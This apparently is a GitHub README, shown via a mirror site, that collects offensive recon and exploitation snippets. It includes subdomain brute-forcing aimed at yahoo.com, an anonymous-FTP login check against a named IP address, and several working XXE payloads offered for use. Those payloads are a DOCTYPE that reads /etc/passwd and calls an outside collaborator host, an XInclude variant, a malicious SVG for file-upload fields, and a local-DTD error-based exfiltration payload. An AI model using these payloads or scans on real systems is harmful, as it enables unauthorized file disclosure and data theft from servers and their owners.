Git Product home page Git Product logo

upcomming1's Introduction

Some Importent script for automation

writen by: RobinTrigon | 3rr0r-404

Brutforce sobdomain via ffuf

subs="/home/aruu/Desktop/ath3na/sub.txt" ; act="https://FUZZ.yahoo.com" ; ffuf -w $subs -v -t 300 -timeout 15  -u "$act" -o lol | grep "URL" | tee -a result.txt ; rm lol

Remove scheme from list of urls

for url in $(cat lis_of_urls.txt);do
 echo "$url"|awk -F[/:] '{print $4}'
done

collect all subdomains ip from target website

assetfinder --subs-only "testfire.net" |dig| grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

subdomain brutforce via host command

for sub in $(cat brutforce_payload.txt) 
do
if host $sub.target.com &>/dev/null 
then
echo "$sub.target.com"
fi
done

Anonymous ftp login [cradit:JoyGhoshs]

curl -m 6 -s ftp://178.33.155.61 --user "Anonymous:Anonymous" | grep "r" &>/dev/null && echo -e "\033[31mAnonymous Login allowed" || echo " [+]  Not Allowe

collect all urls from text file

cat target.txt| grep -Eo '(http|https|ftp|aaa|aaas|acap|acct|acr|xmpp|udp|s3|git|file|apt|admin|app)://[a-zA-Z0-9./?=_%:-]*

must try

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd"><!ENTITY sp SYSTEM "https://collabretor/">]><r>&xxe;&sp;</r>

Peram Based

Just replace any peramiter with it and egrep "root:x|daemon:x"

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

file upload

save this as svg file and upload it. now check your uploaded picture with root:x content.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

brutforceing dtd

bruteforce "bruteforce-here" with your dtd list and grep root:x | daemon:x

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file://bruteforce-here">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

upcomming1's People

Contributors

robintrigon avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.